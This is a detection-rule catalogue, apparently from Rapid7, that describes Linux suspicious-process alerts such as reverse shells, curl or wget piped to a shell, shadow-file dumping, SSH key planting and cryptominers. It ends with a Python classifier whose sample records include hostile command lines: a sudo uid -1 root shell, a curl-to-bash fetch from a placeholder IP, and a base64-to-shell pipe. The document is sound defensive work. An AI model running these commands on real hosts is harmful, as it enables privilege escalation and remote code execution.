Linux Suspicious Process
These detections identify suspicious activity from process start records collected by the Insight Agent from Linux endpoints.
Attacker - Sudo Privilege Escalation Attempt
Description
Looks for the attempted exploitation of a vulnerability in sudo that allows standard users to become root by specifying a user id of -1 or 4294967295.
Recommendation
Review the command in question passed to sudo to see if it was executed successfully under the context of the root user.
MITRE ATT&CK Techniques
- Exploitation for Privilege Escalation - T1068
Attacker Technique - Apache Struts/Tomcat Spawns Uname
Description
This detection identifies ‘uname’ being spawned by ‘java’ running an Apache Tomcat web service. This technique is used by malicious actors to validate that an Apache Struts Tomcat server was successfully exploited.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Attacker Technique - Cat /etc/shadow
Description
This detection identifies the /etc/password file appearing in a command line. A malicious actor may try to dump the contents of this file for offline password cracking.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- /etc/passwd and /etc/shadow - T1003.008
Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL
Description
This detection identifies the 'curl' or 'wget' utility being used to contact a web server at a remote IP address with the IP address of the vulnerable system embedded in the URL. Malicious actors use utilities such as these to call back to systems they control in order to validate which systems the attack succeeded against.
Recommendation
Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port
Description
This detection identifies the 'curl' or 'wget' utility being used to access a web server at a remote IP address on a non-standard port. Malicious actors often use utilities such as these to download additional payloads after gaining access to a target resource.
Recommendation
Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Attacker Technique - Linux Reverse Shell
Description
This detection identifies simple techniques for creating a reverse shell in Linux using built-in utilities. Malicious actors use this technique to deliver a shell from the compromised host back to their system so that additional system commands can be executed post-compromise.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Command and Scripting Interpreter - T1059
Attacker Technique - Perl Use Socket Reverse Shell
Description
This detection identifies simple ‘perl’ based reverse shells using the ‘Socket’ module being passed to the command line. Malicious actors use this technique post compromise to deliver a shell from the compromised host back to their system so that additional system commands can be executed.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Non-Application Layer Protocol - T1095
Attacker Technique - Shell Redirection To or From /dev/tcp
Description
This detection identifies redirection of a shell to a remote host through the device ‘/dev/tcp’. Malicious actors use this technique to deliver a shell from a compromised host back to their system so that additional commands can be executed post-compromise.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Non-Application Layer Protocol - T1095
Attacker Technique - Unshadow
Description
This detection identifies the 'unshadow' utility being executed. Malicious actors use it to combine the contents of the '/etc/shadow' and '/etc/passwd' files into the format expected by password cracking utilities.
Recommendation
Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- OS Credential Dumping - T1003
- /etc/passwd and /etc/shadow - T1003.008
Attacker Tools - Cobalt Strike Client Application - Linux
Description
This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Linux operating systems.
Recommendation
Investigate the process events to identify if this activity is authorized and expected within the client network.
MITRE ATT&CK Techniques
- Obtain Capabilities - T1588
Attacker Tool - Unknown Webshell Style Command
Description
This detection identifies commands being executed with the prefix of 'cd "/";' and a suffix of '2>&1' in the command line. This style of command execution has been used by malicious actors post compromise with webshell(s) of an unknown type.
Recommendation
Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Command and Scripting Interpreter - T1059
- Server Software Component - T1505
- Web Shell - T1505.003
Cryptocurrency Miner - Identify Writable Directories
Description
This detection identifies the 'touch' command being used to attempt to write a file, called 'writable', to various directories. This has been observed in cryptocurrency mining malware that is attempting to find writable directories.
Recommendation
Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Kworker
Description
This detection identifies Kworker, a customized version of the Linux bitcoin mining software Minerd. Malicious actors drop Kworker on systems post-compromise via other malware, such as Mirai.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - MinerGate
Description
This detection identifies the command line including the string ‘Minergate’. ‘Minergate’ is a command-line Bitcoin miner often deployed by malicious actors.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Mining Pool URL in Command Line
Description
Mining pools are a way for multiple systems running cryptomining software to pool their resources over the network. Cryptocurrency mining malware will often use mining pools to increase efficiency, as it allows all of the attacker's compromised systems to work together.
Recommendation
Identify the miner process on the system. This can often be done easily by doing a process listing and identifying the process using the most CPU resources.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Process Kills Other Mining Processes
Description
This detection identifies the ‘kill’ command being used in an attempt to stop the processes of cryptocurrency miners. Cryptocurrency miners will attempt to identify any other miners running on a system to ensure that it will not be competing for resources.
Recommendation
Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - Watchbog
Description
Watchbog is a cryptocurrency mining trojan for Linux. It downloads payloads from Pastebin, and spreads laterally by exploiting Jenkins and Redis server vulnerabilities.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Cryptocurrency Miner - XMRig
Description
This detection identifies command line arguments consistent with XMRig. XMRig is a command-line Monero miner often deployed by malicious actors.
Recommendation
Determine if the process being launched is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.
MITRE ATT&CK Techniques
- Resource Hijacking - T1496
Defense Evasion - HISTCONTROL=ignorespace
Description
This detection identifies the environment variable HISTCONTROL=ignorespace being set on Linux systems. This causes any command that starts with a space not to be written to the shell history file.
Recommendation
Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Clear Command History - T1070.003
Reconnaissance - Multiple SSH Discovery Commands
Description
This detection identifies multiple commands being run that attempt to discover information about SSH activity on the system. These commands include searching for id_rsa and known_hosts files, searching the contents of the bash_history file, searching the contents of the .ssh/config file, and searching for .pem certificates.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious Command - Remove and Recreate SSH Config Folder
Description
This detection identifies the ~/.ssh directory being removed and recreated. Malware has been observed doing this in order to overwrite any existing SSH configurations with its own.
Recommendation
Investigate the new files in the ~/.ssh directory. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious Command - SSH Key Echoed to Authorized Keys File
Description
This detection identifies SSH keys being echoed via the command line into the ~/.ssh/authorized_keys file. Malware has been observed doing this in order to allow SSH access to the operator.
Recommendation
Investigate the key that was added. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- SSH - T1021.004
- SSH Authorized Keys - T1098.004
Suspicious File - File Copied to Web Directory
Description
This detection identifies the mv command being used to move a file to a www directory. This may indicate a malicious actor is placing a web shell.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - Apache Launches Wget or Curl
Description
This detection identifies an Apache process launching Curl or Wget. This may be done by a malicious actor who has compromised a web server in order to download additional malware.
Recommendation
Investigate the URL that is being contacted and whether or not it has a legitimate business use. If this activity is not benign or expected, consider rebuilding the host from a known, good source.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
- Web Shell - T1505.003
Suspicious Process - base64 Output Piped to Shell
Description
This detection identifies the base64 utility being used to decode base64-encoded command line arguments before passing them on to a shell process such as bash for execution. Malicious actors may use base64 encoded payloads to avoid detection.
Recommendation
Investigate the contents of the base64 encoded string. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Deobfuscate/Decode Files or Information - T1140
Suspicious Process - cat Used to View Bash History File
Description
This detection identifies the cat command being used to show the contents of a .bash_history file. This file contains a history of shell commands that a user has run, and a malicious actor may inspect these commands to identify passwords or other sensitive information.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password and the passwords of any account that may have appeared in the history file.
MITRE ATT&CK Techniques
- Bash History - T1552.003
Suspicious Process - ColdFusion Webserver Spawns Shell Process
Description
This detection identifies shell processes such as 'cmd.exe' or bash being spawned by a ColdFusion process. Suspicious processes launched by ColdFusion may indicate a compromise of the web server.
Recommendation
Investigate the commands being run and attempt to determine their purpose. Look for signs of further activity from a potential malicious actor, such as host or network discovery commands being executed, as these often precede attempts at lateral movement.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - Common Compromised Linux Webserver Commands
Description
This detection identifies commands that Rapid7 has observed being run on compromised Linux webservers, especially those that have been compromised via Oracle Weblogic vulnerabilities CVE-2020-14882 and CVE-2020-14883, as well as Atlassian Confluence vulnerability CVE-2021-26084.
Recommendation
Investigate the processes spawned. Some commands may be encoded in hexadecimal or base64 - these should be decoded so that the intent can be determined. If this activity is not benign or expected, consider rebuilding the host from a known, good source and updating to the latest version of the server software.
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Suspicious Process - Confluence Java App Launching Processes
Description
This detection identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084 or CVE-2022-26134, vulnerabilities in Confluence which can allow execution of arbitrary processes. Confluence does sometimes spawn processes legitimately, but special attention should be paid to common reconnaissance commands like whoami or ifconfig, as well as any commands that indicate additional files being downloaded, such as curl or wget.
Recommendation
Investigate the processes spawned by Confluence. Some commands may be encoded in hexadecimal or base64 - these should be decoded so that the intent can be determined. If this activity is not benign or expected, consider rebuilding the host from a known, good source and updating to the latest version of Confluence.
Additional information can be found on Rapid7's blog:
- CVE-2021-26084: https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/
- CVE-2022-26134: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
Suspicious Process - Curl Downloading From Cloudfront URL
Description
This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.
Recommendation
Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Web Service - T1102
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Downloading Shell Script
Description
This detection identifies Curl being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.
Recommendation
Investigate the URL and the file that was pulled from it. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Curl or WGet Pipes Output to Shell
Description
This detection identifies output from the Curl or WGet utility being piped to bash or another shell process. Malicious actors may use Curl or WGet to download additional malware, and pipe that malware to a shell for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Unix Shell - T1059.004
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Perl
Description
This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Python
Description
This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Python - T1059.006
- Ingress Tool Transfer - T1105
Suspicious Process - Deleting ld.so.preload
Description
This detection identifies the file ld.so.preload being deleted. This file contains a list of libraries that will be loaded by any user-mode process, and a malicious actor may replace it with one that points to their own malicious code.
Recommendation
Investigate the contents of the ld.so.preload file. Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Shared Modules - T1129
Suspicious Process - Fetch Command to External IP Address
Description
This detection identifies the fetch command being used to communicate with an external IP address. Malicious actors use the fetch command to download second stage payloads during Linux compromises.
Recommendation
Investigate the IP address that is being contacted and the contents of any files named ‘fetch.txt’, as this is the default file that the fetch command will write to. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Grepping Shell History
Description
This detection identifies the Grep command being used to search the contents of the shell history file. A malicious actor may do this in order to identify sensitive information such as passwords, or targets for lateral movement.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Bash History - T1552.003
Suspicious Process - Linux Adding User using dbus-send CreateUser
Description
This detection identifies a user creation attempt using the Linux dbus-send command. The underlying Linux vulnerability can be exploited to gain root access via privilege escalation with polkit. Malicious actors can use this to add a root user, thus gaining root-level access to the system.
Recommendation
Determine whether this activity is benign or expected. If it is not expected, consider rebuilding the host from a known, good source and having the user change their password. Also check for any new root user that may have been added through successful exploitation of this vulnerability.
Suspicious Process - Linux Setting User Password using dbus-send SetPassword
Description
This detection identifies a SetPassword attempt using the Linux dbus-send command. The underlying Linux vulnerability can be exploited to gain root access via privilege escalation with polkit. Malicious actors can use this to add a root user and set its password, thus gaining root-level access to the system.
Recommendation
Determine whether this activity is benign or expected. If it is not expected, consider rebuilding the host from a known, good source and having the user change their password. Also check for any new root user that may have been added through successful exploitation of this vulnerability.
MITRE ATT&CK Techniques
- Exploitation for Privilege Escalation - T1068
Suspicious Process - Linux System OS Discovery Command
Description
This detection identifies an attempt to use cat to output the contents of files in the /etc directory that may contain OS information. Malicious actors may do this to know what OS version to target. This command has been observed in use by the RotaJakiro malware.
Recommendation
Determine whether this is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Software Discovery - T1518
Suspicious Process - Linux Webserver Executing Commands
Description
Identifies suspicious commands executed by processes belonging to commonly used webserver software, such as Apache or Nginx. Commands executed by a webserver process can be indicative of a web shell or otherwise compromised webserver.
Recommendation
Determine whether the commands being executed are part of the expected operation of the server. If not, investigate any files, domains, or IP addresses that the executed commands may have interacted with.
MITRE ATT&CK Techniques
- Web Shell - T1505.003
Suspicious Process - lwp-download to External IP Address
Description
This detection identifies LWP-Download, which is a Linux utility for downloading files from the internet. Malicious actors can use LWP-download to download second stage payloads during Linux compromises.
Recommendation
Examine the command run and the URL it is contacting. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Possible Reverse Shell
Description
This detection identifies a number of reverse shells that can be created using mostly built-in Linux functions. Attackers may use these reverse shells for C2 purposes.
Recommendation
Examine the process that spawned the shell, and anything that the shell process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Unix Shell - T1059.004
Suspicious Process - ssh_authorized_keys in Command Line
Description
This detection identifies when the ssh_authorized_keys file appears in a command line. A malicious actor may modify this file so that they may access the host with their own SSH key.
Recommendation
Ensure that the key corresponds to a host from which authorization is expected.
MITRE ATT&CK Techniques
- SSH Authorized Keys - T1098.004
Suspicious Process - SysJoker Process Names
Description
This detection identifies process names identified as part of the SysJoker malware family. SysJoker is a multi-platform backdoor that masquerades as a system update.
Recommendation
Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Masquerading - T1036
Suspicious Process - VMware Workspace ONE Access Launches Process
Description
This detection identifies the Apache prunsrv component of VMware Workspace ONE Access launching suspicious processes. This may be indicative of remote code execution resulting from exploitation of CVE-2022-22954. See our blog post for more information: https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/
Recommendation
Ensure VMware components are upgraded to the latest version. Review the process that was launched and any processes that it may have launched. If this activity is not benign or expected, consider rebuilding the host from a known, good source.
MITRE ATT&CK Techniques
- Exploitation of Remote Services - T1210
Suspicious Process - WGet Output Piped to Bash
Description
This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - Wget Output Piped to Perl
Description
This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - WGet Output Piped to Python
Description
This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.
Recommendation
Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
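As an added illustration of the process-record patterns behind several entries on this page (the sudo uid -1 entry, the curl/wget/base64 output-piped-to-shell entries, HISTCONTROL=ignorespace, Apache launching curl or wget, and the 'cd "/"; ... 2>&1' webshell-style command), here is a small Python classifier. It is example code written for this page, not Rapid7's detection logic; the record layout (parent_name, process_name, cmdline), the tag names and the sample records are constructed assumptions, not the Insight Agent's schema.

```python
"""Toy classifier for some of the Linux process-start patterns this page describes.
Example code, not Rapid7's logic: the record layout and samples are constructed."""
import re
import shlex

# Downloaders and the decoder the page names; piping their output into an interpreter is the signal.
DOWNLOADERS = {"curl", "wget", "fetch", "lwp-download"}
DECODER = "base64"
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
INTERPRETERS = SHELLS | {"perl", "python", "python2", "python3"}
WEBSERVERS = {"apache2", "httpd", "nginx"}      # "Apache or Nginx" per the page
SUDO_BAD_UIDS = {"-1", "4294967295"}            # from the sudo entry on this page
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
HISTCONTROL_RE = re.compile(r"\bHISTCONTROL=ignorespace\b")
WEBSHELL_STYLE_RE = re.compile(r'^cd "/";.*2>&1\s*$')  # prefix/suffix from the page

def basename(path):
    return path.rsplit("/", 1)[-1]

def pipeline_stages(cmdline):
    """Split a command line into pipeline stages, each a list of argv tokens.
    punctuation_chars makes '|' its own token even without surrounding spaces, quoting is
    honoured, and comment handling is off so sudo's '-u#uid' is not dropped as a comment."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""
    try:
        tokens = list(lexer)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        tokens = cmdline.split()
    stages, current = [], []
    for tok in tokens:
        if tok == "|":
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    stages = [s for s in stages if s]
    # 'sh -c "<script>"': the pipeline of interest lives inside the quoted argument.
    if len(stages) == 1 and stage_program(stages[0]) in SHELLS and "-c" in stages[0]:
        idx = stages[0].index("-c")
        if idx + 1 < len(stages[0]):
            return pipeline_stages(stages[0][idx + 1])
    return stages

def stage_program(stage):
    """Basename of the first token that is not a VAR=value assignment."""
    for tok in stage:
        if not ASSIGNMENT_RE.match(tok):
            return basename(tok)
    return ""

def sudo_target_uid(stage):
    """Uid given with sudo's -u#<uid> (or -u '#<uid>') syntax, or None."""
    tokens = iter(stage[1:])
    for tok in tokens:
        if tok == "-u":
            tok = "-u" + next(tokens, "")
        if tok.startswith("-u#"):
            return tok[3:]
    return None

def classify(record):
    """Tags of the page's detections that one process-start record matches."""
    cmdline = record["cmdline"]
    stages = pipeline_stages(cmdline)
    programs = [stage_program(s) for s in stages]
    hits = []
    if programs and programs[0] == "sudo" and sudo_target_uid(stages[0]) in SUDO_BAD_UIDS:
        hits.append("sudo-uid-minus-one")               # Sudo Privilege Escalation Attempt
    for producer, consumer in zip(programs, programs[1:]):  # adjacent stages: producer | consumer
        if producer in DOWNLOADERS and consumer in INTERPRETERS:
            hits.append("downloader-piped-to-interpreter")  # Curl/WGet Output Piped to ...
        elif producer == DECODER and consumer in SHELLS:
            hits.append("base64-piped-to-shell")
    if HISTCONTROL_RE.search(cmdline):
        hits.append("histcontrol-ignorespace")
    if basename(record.get("parent_name", "")) in WEBSERVERS and programs and programs[0] in DOWNLOADERS:
        hits.append("webserver-spawns-downloader")      # Apache Launches Wget or Curl
    if WEBSHELL_STYLE_RE.match(cmdline):
        hits.append("webshell-style-command")           # Unknown Webshell Style Command
    return hits

SAMPLE_RECORDS = [  # constructed; 198.51.100.0/24 is documentation address space
    {"parent_name": "bash", "process_name": "sudo", "cmdline": "sudo -u#-1 /bin/bash"},
    {"parent_name": "apache2", "process_name": "sh",
     "cmdline": 'sh -c "curl -s http://198.51.100.7:8080/x.sh | bash"'},
    {"parent_name": "sshd", "process_name": "bash", "cmdline": "echo ZWNobyBoaQo= | base64 -d | sh"},
    {"parent_name": "bash", "process_name": "bash", "cmdline": "HISTCONTROL=ignorespace bash -i"},
    {"parent_name": "java", "process_name": "sh", "cmdline": 'cd "/"; id 2>&1'},
    {"parent_name": "bash", "process_name": "curl", "cmdline": "curl -s https://example.com/index.html"},
]
```

Running classify over SAMPLE_RECORDS tags the first five records and leaves the plain curl fetch untagged; the `sh -c` unwrapping is what lets the Apache-spawned record match both the pipe-to-shell and webserver-spawns-downloader patterns.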
Suspicious Process - Wget to External IP Address
Description
Identifies the wget utility being used to download files from an external IP address. Wget is often used by attackers on Linux-based systems to deploy additional tools after establishing a foothold on a system.
Recommendation
Determine the nature of the IP address by checking WHOIS and DNS records. If no obvious reason for downloading from that IP address exists, attempt to acquire and analyze the file that was downloaded from it.
MITRE ATT&CK Techniques
- Ingress Tool Transfer - T1105
Suspicious Process - WSO2 Product Launches Suspicious Process
Description
This detection identifies suspicious processes launched by a WSO2 product process, which may be indicative of exploitation of CVE-2022-29464. CVE-2022-29464 is an unrestricted arbitrary file upload vulnerability which can lead to remote code execution. Rapid7 has observed this CVE being actively exploited in the wild.
Additional information can be found on our blog: https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/
Recommendation
Investigate any .jsp or .war files created around the time of this activity; they may be web shells.
Additional information and remediation steps can be found in WSO2's advisory, https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
MITRE ATT&CK Techniques
- Exploit Public-Facing Application - T1190
- Exploitation for Client Execution - T1203